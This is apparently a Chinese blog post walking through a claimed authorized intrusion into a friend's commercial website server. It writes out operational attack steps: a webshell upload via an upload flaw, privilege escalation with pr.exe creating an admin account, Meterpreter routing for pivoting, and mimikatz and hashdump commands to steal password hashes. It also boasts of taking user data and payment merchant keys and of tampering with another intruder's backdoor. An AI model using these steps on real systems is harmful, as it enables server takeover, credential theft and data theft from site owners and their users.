內(nèi)網(wǎng)滲透實(shí)戰(zhàn)(一)

本次測試為實(shí)戰(zhàn),測試環(huán)境為朋友的個人商業(yè)網(wǎng)站,服務(wù)器位于某數(shù)據(jù)中心,所提漏洞已通知并協(xié)助修復(fù)

首先借助該網(wǎng)站某處上傳漏洞,實(shí)現(xiàn)一句話木馬上傳,然后使用菜刀連接。


一句話

借助菜刀上傳asp大馬。


asp大馬

發(fā)現(xiàn)當(dāng)前權(quán)限極低,嘗試提權(quán),因為目標(biāo)服務(wù)器為server2003,所以借助木馬上傳功能上傳了pr、cmd。
使用自己上傳的cmd(系統(tǒng)自帶的不能識別)運(yùn)行pr嘗試提權(quán)。
pr.exe "net user rabbit 123456 /add"
pr.exe "net localgroup administrators rabbit/add"

然后登錄嘗試發(fā)現(xiàn)目標(biāo)主機(jī)果然沒有使用默認(rèn)的3389端口。

pr.exe "tasklist /svc"
pr.exe "netstat -nao"

尋找termservice服務(wù)對應(yīng)的PID進(jìn)而尋找端口號,果然遠(yuǎn)程服務(wù)運(yùn)行在一個自定義端口。

這部分不再提供截圖,有疑問的可以參考之前發(fā)布過的一篇文章
http://www.itdecent.cn/p/0ad65b348e8a

嘗試使用asp木馬上傳metepreter木馬,發(fā)現(xiàn)莫名其妙失敗了,,,


metepreter

沒關(guān)系,我們已經(jīng)拿到了服務(wù)器,所以這里我們選擇遠(yuǎn)程桌面來上傳,記得勾上剪貼板。


遠(yuǎn)程桌面上傳
      mstsc /admin

msf木馬反向代理與frp的配置再此省略,大家可以自行參考之前的文章。
成功反彈木馬。


shell

關(guān)于這里有一個小技巧,如果我們是通過asp大馬來運(yùn)行的metepreter,我們的木馬提權(quán)可能會變得十分困難,然而我這里通過管理員用戶來登錄手動運(yùn)行,當(dāng)前權(quán)限即為我們創(chuàng)建的管理員用戶rabbit。


getsystem

這里我們看到,提升至最高權(quán)限也變得異常順利。
#查看當(dāng)前網(wǎng)段
run get_local_subnets
網(wǎng)段查看
#添加路由
run autoroute -s 10.122.128.0/17
添加路由
#添加路由
run autoroute -p
路由查看

然后我們已經(jīng)將msf代入了當(dāng)前pc,使用background將metepreter置入后臺,我們就可以肆意的使用如永恒之藍(lán)等腳本對對方內(nèi)網(wǎng)展開屠殺了。。??瓤龋欢疫@里的pc所處環(huán)境是一個數(shù)據(jù)中心,服務(wù)器之間內(nèi)網(wǎng)互相隔離,當(dāng)然這也是為了安全,關(guān)于這項技術(shù),我們后期有機(jī)會會介紹下。
回到現(xiàn)實(shí),既然我們不能對內(nèi)網(wǎng)進(jìn)行探測了,我們只能嘗試最大限度的擴(kuò)大我們的本機(jī)戰(zhàn)果。
還記得我們?nèi)腴T系列最后一節(jié)提到的load命令嗎,再次借機(jī)會展示一下:


mimikatz
mimikatz_command -f hash::lm
mimikatz_command -f hash::ntlm

借助mimikatz_command我們可以查看當(dāng)前用戶的hash密碼,支持lm/ntlm兩種加密方式。


mimikatz_command

當(dāng)然啦,我們已經(jīng)獲取到了系統(tǒng)system權(quán)限,我們可以借助metepreter自帶的命令直接獲取用戶hash。
如msv,獲取所有用戶詳情:


msv

當(dāng)然,你也可以通過hashdump只查看用戶hash:
hashdump

我們借助主流破解網(wǎng)站居然查到了一條,找小伙伴幫忙付費(fèi)解析了一下,成功拿到了administrator用戶的密碼。


cmd5

游戲當(dāng)然還沒有結(jié)束~
還記得我們之前提到的永久后門么?接下來的思路就是捆進(jìn)程、寫硬盤,然后、呀,翻車了,system依然沒有成功將進(jìn)程捆到系統(tǒng)進(jìn)程里,不過,這里我們已經(jīng)拿到administrator用戶的密碼了,這里且放他一馬。
migrate

然后接下來,整個服務(wù)器都可以為所欲為了,比如數(shù)據(jù)庫、以及各種其它敏感文件,這里拿到了大量用戶數(shù)據(jù)以及管理員賬戶密碼、支付寶商戶賬戶商家key等數(shù)據(jù)。
在打算撤出本次實(shí)戰(zhàn)的時候,突然發(fā)現(xiàn)該網(wǎng)站居然已經(jīng)被上傳過木馬了,本著造福大眾、捍衛(wèi)世界和平的心態(tài),對這位陌生朋友的小木馬進(jìn)行了一個小小的修改,當(dāng)然密碼也順手改掉了w(?Д?)w:
已有后門

希望他早日改邪歸正,emmmmm,一個人也要好好噠!
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容